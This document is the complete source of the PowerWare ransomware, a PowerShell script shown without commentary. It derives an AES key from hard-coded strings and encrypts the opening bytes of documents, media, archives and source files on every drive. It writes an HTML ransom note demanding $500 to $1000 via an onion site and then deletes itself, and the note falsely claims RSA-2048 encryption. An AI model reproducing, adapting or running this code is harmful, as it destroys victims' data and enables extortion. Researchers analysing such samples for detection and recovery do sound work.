PowerWare ransomware

1. $3874834648482342 = "gRgxncRtshhfcRhnYjjxWdahsjHHNcgFhhsHHJFGbdFGHJHrfThsjdU"
2. $376385476393694623 = "UYUhxWsagfsEgshThgnhccRghsdUUJgcrXhzicGhsjThgdhj"
3. $879587454376573 = ([ChaR[]](GeT-Random -Input $(48..57 + 65..90 + 97..122) -Count 24)) -join ""
4. Start-Sleep 44
5. [byte[]]$56437843773343=[system.Text.Encoding]::Unicode.GetBytes($3874834648482342)
6. $GxhRgsjhdYHnJkl = 23 + 10
7. $VGHKJJGFERHJJGSDQWD = [Text.Encoding]::UTF8.GetBytes($376385476393694623)
8. $cWijGhxjctJJjRgjj = new-Object System.Security.Cryptography.RijndaelManaged
9. $cWijGhxjctJJjRgjj.Key = (new-Object Security.Cryptography.Rfc2898DeriveBytes $3874834648482342, $VGHKJJGFERHJJGSDQWD, 5).GetBytes(32)
10. $cWijGhxjctJJjRgjj.IV = (new-Object Security.Cryptography.SHA1Managed).ComputeHash([Text.Encoding]::UTF8.GetBytes("alle") )[0..15]
11. $cWijGhxjctJJjRgjj.Padding="Zeros"
12. $cWijGhxjctJJjRgjj.Mode="CBC"
13. $RgxnnHgxghRThajcUJJ= gdr|where {$_.Free}|Sort-Object -Descending
14. foreach($TgbcRThahjdRRGHjj in $RgxnnHgxghRThajcUJJ){
15.  gci $TgbcRThahjdRRGHjj.root -Recurse -Include "*.docx","*.xls","*.pdf","*.xlsx","*.mp3","*.jpeg","*.jpg","*.txt","*.rtf","*.doc","*.rar","*.zip","*.psd","*.tif","*.wma","*.gif","*.bmp","*.ppt","*.pptx","*.docm","*.xlsm","*.pps","*.ppsx","*.ppd","*.eps","*.png","*.ace","*.djvu","*.tar","*.cdr","*.max","*.wmv","*.avi","*.wav","*.mp4","*.pdd","*.php","*.aac","*.ac3","*.amr","*.dwg","*.dxf","*.accdb","*.mod","*.tax2013","*.tax2014","*.oga","*.ogg","*.pbf","*.ra","*.raw","*.saf","*.wave","*.wow","*.wpk","*.3g2","*.3gp","*.3gp2","*.3mm","*.amx","*.avs","*.bik","*.dir","*.divx","*.dvx","*.evo","*.flv","*.qtq","*.tch","*.rts","*.rum","*.rv","*.scn","*.srt","*.stx","*.svi","*.swf","*.trp","*.vdo","*.wm","*.wmd","*.wmmp","*.wmx","*.wvx","*.xvid","*.3d","*.3d4","*.3df8","*.pbs","*.adi","*.ais","*.amu","*.arr","*.bmc","*.bmf","*.cag","*.cam","*.dng","*.ink","*.jif","*.jiff","*.jpc","*.jpf","*.jpw","*.mag","*.mic","*.mip","*.msp","*.nav","*.ncd","*.odc","*.odi","*.opf","*.qif","*.xwd","*.abw","*.act","*.adt","*.aim","*.ans","*.asc","*.ase","*.bdp","*.bdr","*.bib","*.boc","*.crd","*.diz","*.dot","*.dotm","*.dotx","*.dvi","*.dxe","*.mlx","*.err","*.euc","*.faq","*.fdr","*.fds","*.gthr","*.idx","*.kwd","*.lp2","*.ltr","*.man","*.mbox","*.msg","*.nfo","*.now","*.odm","*.oft","*.pwi","*.rng","*.rtx","*.run","*.ssa","*.text","*.unx","*.wbk","*.wsh","*.7z","*.arc","*.ari","*.arj","*.car","*.cbr","*.cbz","*.gz","*.gzig","*.jgz","*.pak","*.pcv","*.puz","*.r00","*.r01","*.r02","*.r03","*.rev","*.sdn","*.sen","*.sfs","*.sfx","*.sh","*.shar","*.shr","*.sqx","*.tbz2","*.tg","*.tlz","*.vsi","*.wad","*.war","*.xpi","*.z02","*.z04","*.zap","*.zipx","*.zoo","*.ipa","*.isu","*.jar","*.js","*.udf","*.adr","*.ap","*.aro","*.asa","*.ascx","*.ashx","*.asmx","*.asp","*.indd","*.asr","*.qbb","*.bml","*.cer","*.cms","*.crt","*.dap","*.htm","*.moz","*.svr","*.url","*.wdgt","*.abk","*.bic","*.big","*.blp","*.bsp","*.cgf","*.chk","*.col","*.cty","*.dem","*.elf","*.ff","*.gam","*.grf","*.h3m","*.h4r","*.iwd","*.ldb","*.lgp","*.lvl","*.map","*.md3","*.mdl","*.mm6","*.mm7","*.mm8","*.nds","*.pbp","*.ppf","*.pwf","*.pxp","*.sad","*.sav","*.scm","*.scx","*.sdt","*.spr","*.sud","*.uax","*.umx","*.unr","*.uop","*.usa","*.usx","*.ut2","*.ut3","*.utc","*.utx","*.uvx","*.uxx","*.vmf","*.vtf","*.w3g","*.w3x","*.wtd","*.wtf","*.ccd","*.cd","*.cso","*.disk","*.dmg","*.dvd","*.fcd","*.flp","*.img","*.iso","*.isz","*.md0","*.md1","*.md2","*.mdf","*.mds","*.nrg","*.nri","*.vcd","*.vhd","*.snp","*.bkf","*.ade","*.adpb","*.dic","*.cch","*.ctt","*.dal","*.ddc","*.ddcx","*.dex","*.dif","*.dii","*.itdb","*.itl","*.kmz","*.lcd","*.lcf","*.mbx","*.mdn","*.odf","*.odp","*.ods","*.pab","*.pkb","*.pkh","*.pot","*.potx","*.pptm","*.psa","*.qdf","*.qel","*.rgn","*.rrt","*.rsw","*.rte","*.sdb","*.sdc","*.sds","*.sql","*.stt","*.t01","*.t03","*.t05","*.tcx","*.thmx","*.txd","*.txf","*.upoi","*.vmt","*.wks","*.wmdb","*.xl","*.xlc","*.xlr","*.xlsb","*.xltx","*.ltm","*.xlwx","*.mcd","*.cap","*.cc","*.cod","*.cp","*.cpp","*.cs","*.csi","*.dcp","*.dcu","*.dev","*.dob","*.dox","*.dpk","*.dpl","*.dpr","*.dsk","*.dsp","*.eql","*.ex","*.f90","*.fla","*.for","*.fpp","*.jav","*.java","*.lbi","*.owl","*.pl","*.plc","*.pli","*.pm","*.res","*.rsrc","*.so","*.swd","*.tpu","*.tpx","*.tu","*.tur","*.vc","*.yab","*.8ba","*.8bc","*.8be","*.8bf","*.8bi8","*.bi8","*.8bl","*.8bs","*.8bx","*.8by","*.8li","*.aip","*.amxx","*.ape","*.api","*.mxp","*.oxt","*.qpx","*.qtr","*.xla","*.xlam","*.xll","*.xlv","*.xpt","*.cfg","*.cwf","*.dbb","*.slt","*.bp2","*.bp3","*.bpl","*.clr","*.dbx","*.jc","*.potm","*.ppsm","*.prc","*.prt","*.shw","*.std","*.ver","*.wpl","*.xlm","*.yps","*.md3","*.1cd"|%{
16.   try{
17.    $ChhxnRJhhsncGHH = New-Object System.IO.BinaryReader([System.IO.File]::Open($_, [System.IO.FileMode]::Open, [System.IO.FileAccess]::ReadWrite, [System.IO.FileShare]::Read),[System.Text.Encoding]::ASCII)
18.    if ($ChhxnRJhhsncGHH.BaseStream.Length -lt 2048){return}
19.    else
20.    {
21.                         $gjYujsjdRThsncGHja = 2048
22.    }
23.                         $56437843773343 = $ChhxnRJhhsncGHH.ReadBytes($gjYujsjdRThsncGHja)
24.    $ChhxnRJhhsncGHH.Close()
25.    $JkkxTYajncGRahjdjHJ = $cWijGhxjctJJjRgjj.CreateEncryptor()
26.    $oUUixjHHhjjxRTHNJ = new-Object IO.MemoryStream
27.    $HhxjhTTYhajdJJJasO = new-Object Security.Cryptography.CryptoStream $oUUixjHHhjjxRTHNJ,$JkkxTYajncGRahjdjHJ,"Write"
28.    $HhxjhTTYhajdJJJasO.Write($56437843773343, 0,$56437843773343.Length)
29.    $HhxjhTTYhajdJJJasO.Close()
30.    $oUUixjHHhjjxRTHNJ.Close()
31.    $JkkxTYajncGRahjdjHJ.Clear()
32.    $Bnx587Fhsjc7ijF4 = $oUUixjHHhjjxRTHNJ.ToArray()
33.    $HhjxcRTahjdUYUIN = New-Object System.IO.BinaryWriter([System.IO.File]::Open($_, [System.IO.FileMode]::Open, [System.IO.FileAccess]::ReadWrite, [System.IO.FileShare]::Read),[System.Text.Encoding]::ASCII)
34.    $HhjxcRTahjdUYUIN.Write($Bnx587Fhsjc7ijF4,0,$Bnx587Fhsjc7ijF4.Length)
35.    $HhjxcRTahjdUYUIN.Close()
36.    $uUhxjhcTYhajWRahhd = $_.Directory.ToString() + '\README-Encrypted_Files.HTML'
37. $YuxjncRgahdjjcTYHJ = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("PGh0bWw+DQo8dGl0bGU+WW91ciBGaWxlcyBBcmUgRW5jcnlwdGVkPC90aXRsZT4NCjxzdHlsZT4NCmEgeyBjb2xvcjpncmVlbjsgfQ0KLnRiIHsgIGJhY2tncm91bmQ6d2hpdGU7IGJvcmRlci1zdHlsZTpzb2xpZDsgYm9yZGVyLXdpZHRoOjFweDsgcGFkZGluZzozcHg7IGJvcmRlci1jb2xvcjpsaW1lOyB9DQoudHRsIHsgZm9udC1zaXplOjEzcHg7IGNvbG9yOjg4MDAwMDsgfQ0KPC9zdHlsZT4NCjxib2R5IHN0eWxlPSJ3aWR0aDoxMDAlOyBiYWNrZ3JvdW5kOiMzM0NDRkY7Ij4NCiAgPGNlbnRlcj4NCiAgPGRpdiBzdHlsZT0idGV4dC1hbGlnbjpsZWZ0OyBmb250LWZhbWlseTpBcmlhbDsgZm9udC1zaXplOjEzcHg7IGxpbmUtaGVpZ2h0OjIwcHg7IG1hcmdpbi10b3A6MTBweDsgd2lkdGg6ODAwcHg7IGJhY2tncm91bmQ6I0Y0RjRGNDsgcGFkZGluZzoyMHB4OyBib3JkZXItc3R5bGU6c29saWQ7IGJvcmRlci13aWR0aDo1cHg7IGJvcmRlci1jb2xvcjojQkFCQUJBOyI+DQogICAgPGI+PGZvbnQgY2xhc3M9InR0bCI+V2hhdCBoYXBwZW5lZCB0byB5b3VyIGZpbGVzPzwvYj48L2ZvbnQ+DQogICAgPGJyPg0KICAgIDxmb250IHN0eWxlPSJmb250LXNpemU6MTNweDsiPkFsbCBvZiB5b3VyIGZpbGVzIHdlcmUgcHJvdGVjdGVkIGJ5IGEgc3Ryb25nIGVuY3J5cHRpb24gd2l0aCBSU0EtMjA0OC4NCiAgICA8YnI+DQogICAgTW9yZSBpbmZvcm1hdGlvbiBhYm91dCB0aGUgZW5jcnlwdGlvbiBrZXlzIHVzaW5nIFJTQS0yMDQ4IGNhbiBiZSBmb3VuZCBoZXJlOiA8YSBocmVmPSJodHRwOi8vZW4ud2lraXBlZGlhLm9yZy93aWtpL1JTQV8oY3J5cHRvc3lzdGVtKSIgdGFyZ2V0PSJfYmxhbmsiPmh0dHA6Ly9lbi53aWtpcGVkaWEub3JnL3dpa2kvUlNBXyhjcnlwdG9zeXN0ZW0pPC9hPjxicj48L2ZvbnQ+DQogICAgPGJyPg0KICAgIDxiPjxmb250IGNsYXNzPSJ0dGwiPldoYXQgZG9lcyB0aGlzIG1lYW4/PC9iPjwvZm9udD4NCiAgICA8YnI+DQogICAgPGZvbnQgc3R5bGU9ImZvbnQtc2l6ZToxM3B4OyI+DQogICAgICBUaGlzIG1lYW5zIHRoYXQgdGhlIHN0cnVjdHVyZSBhbmQgZGF0YSB3aXRoaW4geW91ciBmaWxlcyBoYXZlIGJlZW4gaXJyZXZvY2FibHkgY2hhbmdlZCwgeW91IHdpbGwgbm90IGJlIGFibGUgdG8gd29yazxicj4gd2l0aCB0aGVtLCByZWFkIHRoZW0gb3Igc2VlIHRoZW0sIGl0IGlzIHRoZSBzYW1lIHRoaW5nIGFzIGxvc2luZyB0aGVtIGZvcmV2ZXIsIGJ1dCB3aXRoIG91ciBoZWxwLCB5b3UgY2FuIHJlc3RvcmUgdGhlbS4NCiAgICA8L2ZvbnQ+DQogICAgPGJyPjxicj4NCiAgICA8Yj48Zm9udCBjbGFzcz0idHRsIj5Ib3cgZGlkIHRoaXMgaGFwcGVuPzwvYj48L2ZvbnQ+DQogICAgPGJyPg0KICAgIDxmb250IHN0eWxlPSJmb250LXNpemU6MTNweDsiPg0KICAgICAgRXNwZWNpYWxseSBmb3IgeW91LCBvbiBvdXIgc2VydmVyIHdhcyBnZW5lcmF0ZWQgdGhlIHNlY3JldCBrZXkgcGFpciBSU0EtMjA0OCAtIHB1YmxpYyBhbmQgcHJpdmF0ZS4NCiAgICAgIDxicj4NCiAgICAgIEFsbCB5b3VyIGZpbGVzIHdlcmUgZW5jcnlwdGVkIHdpdGggdGhlIHB1YmxpYyBrZXksIHdoaWNoIGhhcyBiZWVuIHRyYW5zZmVycmVkIHRvIHlvdXIgY29tcHV0ZXIgdmlhIHRoZSBJbnRlcm5ldC4NCiAgICAgIDxicj4NCiAgICAgIERlY3J5cHRpbmcgb2YgeW91ciBmaWxlcyBpcyBvbmx5IHBvc3NpYmxlIHdpdGggdGhlIGhlbHAgb2YgdGhlIHByaXZhdGUga2V5IGFuZCBkZWNyeXB0IHByb2dyYW0sIHdoaWNoIGlzIG9uIG91ciBzZWNyZXQgc2VydmVyLg0KICAgIDwvZm9udD4NCiAgICA8YnI+PGJyPg0KICAgIDxiPjxmb250IGNsYXNzPSJ0dGwiPldoYXQgZG8gSSBkbz88L2I+PC9mb250Pg0KICAgIDxicj4NCiAgICA8Zm9udCBzdHlsZT0iZm9udC1zaXplOjEzcHg7Ij4NCiAgICAgIEFsYXMsIGlmIHlvdSBkbyBub3QgdGFrZSB0aGUgbmVjZXNzYXJ5IG1lYXN1cmVzIGZvciB0aGUgc3BlY2lmaWVkIHRpbWUgdGhlbiB0aGUgY29uZGl0aW9ucyBmb3Igb2J0YWluaW5nIHRoZSBwcml2YXRlIGtleSB3aWxsIGJlIGNoYW5nZWQuDQogICAgICA8YnI+DQogICAgICBJZiB5b3UgcmVhbGx5IHZhbHVlIHlvdXIgZGF0YSwgdGhlbiB3ZSBzdWdnZXN0IHlvdSBkbyBub3Qgd2FzdGUgdmFsdWFibGUgdGltZSBzZWFyY2hpbmcgZm9yIG90aGVyIHNvbHV0aW9ucyBiZWNhdXNlIHRoZXkgZG8gbm90IGV4aXN0Lg0KICAgIDwvZm9udD4NCiAgICA8YnI+PGJyPg0KICAgIDxkaXYgY2xhc3M9InRiIiBzdHlsZT0iY29sb3I6Izg4MDAwMDsgZm9udC1zaXplOjEzcHg7IGJvcmRlci13aWR0aDozcHg7Ij4NCiAgICAgIEZvciBtb3JlIHNwZWNpZmljIGluc3RydWN0aW9ucywgcGxlYXNlIHZpc2l0IHRoaXMgaG9tZSBwYWdlOg0KICAgICAgPGhyPg0KICAgICAgPGI+MS48YSBocmVmPSJodHRwOi8vaDM0bHZ6a240Mm10b3ZpYy5vbmlvbi5udSIgdGFyZ2V0PSJfYmxhbmsiPmh0dHA6Ly9oMzRsdnprbjQybXRvdmljLm9uaW9uLm51PC9hPjwvYj4NCiAgICAgIDxicj4NClBsZWFzZSBzY3JvbGwgYmVsb3cgZm9yIHlvdXIgI1VVSUQ8L2I+DQogICAgPC9kaXY+DQogICAgPGJyPg0KICAgIDxkaXYgY2xhc3M9InRiIiBzdHlsZT0iZm9udC1zaXplOjEzcHg7IGJvcmRlci1jb2xvcjojODgwMDAwOyI+DQogICAgICBJZiBmb3Igc29tZSByZWFzb25zIHRoZSBhZGRyZXNzIGlzIG5vdCBhdmFpbGFibGUsIGZvbGxvdyB0aGVzZSBzdGVwczogPGhyPg0KICAgICAgMS4gRG93bmxvYWQgYW5kIGluc3RhbGwgdG9yLWJyb3dzZXI6IDxhIGhyZWY9Imh0dHA6Ly93d3cudG9ycHJvamVjdC5vcmcvcHJvamVjdHMvdG9yYnJvd3Nlci5odG1sLmVuIiB0YXJnZXQ9Il9ibGFuayI+aHR0cDovL3d3dy50b3Jwcm9qZWN0Lm9yZy9wcm9qZWN0cy90b3Jicm93c2VyLmh0bWwuZW48L2E+PGJyPg0KICAgICAgMi4gQWZ0ZXIgYSBzdWNjZXNzZnVsIGluc3RhbGxhdGlvbiwgcnVuIHRoZSBicm93c2VyIGFuZCB3YWl0IGZvciBpbml0aWFsaXphdGlvbi48YnI+DQogICAgICAzLiBUeXBlIGluIHRoZSBhZGRyZXNzIGJhcjogPGZvbnQgc3R5bGU9ImZvbnQtd2VpZ2h0OmJvbGQ7IGNvbG9yOiMwMDk5Nzc7Ij5oMzRsdnprbjQybXRvdmljLm9uaW9uPC9mb250Pjxicj4NCiAgICAgIDQuIEZvbGxvdyB0aGUgaW5zdHJ1Y3Rpb25zIG9uIHRoZSBzaXRlLg0KICAgIDwvZGl2Pg0KICAgIDxicj4NCiAgICA8YnI+DQogICAgPGI+SU1QT1JUQU5UIElORk9STUFUSU9OOjwvYj48YnI+DQogICAgPGRpdiBjbGFzcz0idGIiIHN0eWxlPSJ3aWR0aDo3OTBweDsiPg0KICAgICAgWW91ciBIb21lIFBBR0U6IDxiPjxhIGhyZWY9Imh0dHA6Ly9oMzRsdnprbjQybXRvdmljLm9uaW9uLm51IiB0YXJnZXQ9Il9ibGFuayI+aHR0cDovL2gzNGx2emtuNDJtdG92aWMub25pb24ubnU8L2E+PC9iPjxicj4NCiAgICAgIFlvdXIgSG9tZSBQQUdFKHVzaW5nIFRPUik6IDxmb250IHN0eWxlPSJmb250LXdlaWdodDpib2xkOyBjb2xvcjojMDA5OTc3OyI+aDM0bHZ6a240Mm10b3ZpYy5vbmlvbjwvZm9udD48YnI+DQogICAgICA8Yj5QbGVhc2Ugc2Nyb2xsIGJlbG93IGZvciB5b3VyICNVVUlEPC9iPjxicj4NCiAgICA8L2Rpdj4NCiAgPC9kaXY+DQogIDwvY2VudGVyPg0KPC9ib2R5Pg0KPC9odG1sPg=="));
38.    if(!(Test-path($uUhxjhcTYhajWRahhd))){
39.    New-Item -Path $uUhxjhcTYhajWRahhd -ItemType file -Value $YuxjncRgahdjjcTYHJ
40.    Add-Content -Path $uUhxjhcTYhajWRahhd -Value ("<p><h2>Your #UUID is $879587454376573</p></h2>")
41.    Add-Content -Path $uUhxjhcTYhajWRahhd -Value ('<p><h2>The price for the decrypter goes from 500 $ to 1000 $ on the day of '+(Get-Date).AddDays(+10))
42.    }}
43.                 catch
44.                 {
45.                
46.                 }
47.         }}
48.   function TUNBWEFGBVVTHJHJ() {
49.     $hxhThajsnjncTYHJH = (Get-Variable MyInvocation -Scope 1).Value
50.     $iUjhxjxrhajjdYHJHJ =  $hxhThajsnjncTYHJH.MyCommand.Path  
51.     Remove-Item $iUjhxjxrhajjdYHJHJ
52. }      
53. TUNBWEFGBVVTHJHJ